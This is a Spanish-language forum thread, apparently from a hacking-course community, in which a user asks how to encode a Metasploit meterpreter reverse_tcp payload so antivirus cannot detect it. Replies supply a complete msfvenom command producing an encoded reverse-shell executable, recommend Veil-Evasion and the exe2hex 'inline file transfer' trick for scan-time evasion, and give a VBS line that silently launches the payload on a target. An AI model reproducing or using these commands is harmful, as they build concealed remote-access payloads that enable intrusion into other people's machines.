encriptacion de payload
Buenas tardes en el ultimo video se ejecuta msfpayload windows/meterpreter/reverse_tcp/ lhost=direccion local lport=443 pero la parte de la encriptacion por el logo de backtrack no se ve alguien me puede decir como encriptar el paylod en este comando para que se blinde y no pueda ser detectado por un virus?,en el utltimo video lo explica pero no he podido ver lo que escriben en esa parte de la linea por el logo de backtrack adademy
cordiales saludos a todos
Debes ser parte de la comunidad para poder comentar.
más de 7 años
muchas gracias compa lo probare en cuanto pueda un saludo
más de 7 años
Veil-Evasion & MSF Venom son muy publicas y su encriptacion es muy conocido, pero todavia funciona con algunas anti-virus.
Si quieres algo que esta totalmente indetectable "scantime" entonces puedes convertir tu payload binary a HEX y despues que esta en el PC del "target" puedes convertir a .exe para ejecutarlo. Eso se llama "Inline File Transfer" y puedes lograr eso con este pequeno herramienta.
https://github.com/g0tmi1k/exe2hex
Ahora puedes crear un script de VBS que puede llamar este payload en silencio, asi:
CreateObject("WScript.Shell").RUN "C:\Users\Public\payload.cmd", 0, True
más de 7 años
buenas, prueba utilizando el msfvenom, un ejemplo:
msfvenom -p windows/meterpreter/reversetcp LHOST=10.0.0.5 LPORT=4444 -e x86/shikataga_nai -i 3 -f exe -o mipayload.exe
tambien puedes utilizar otros generadores de payload como veil-evasion que los genera directmente en varios formatos y opciones.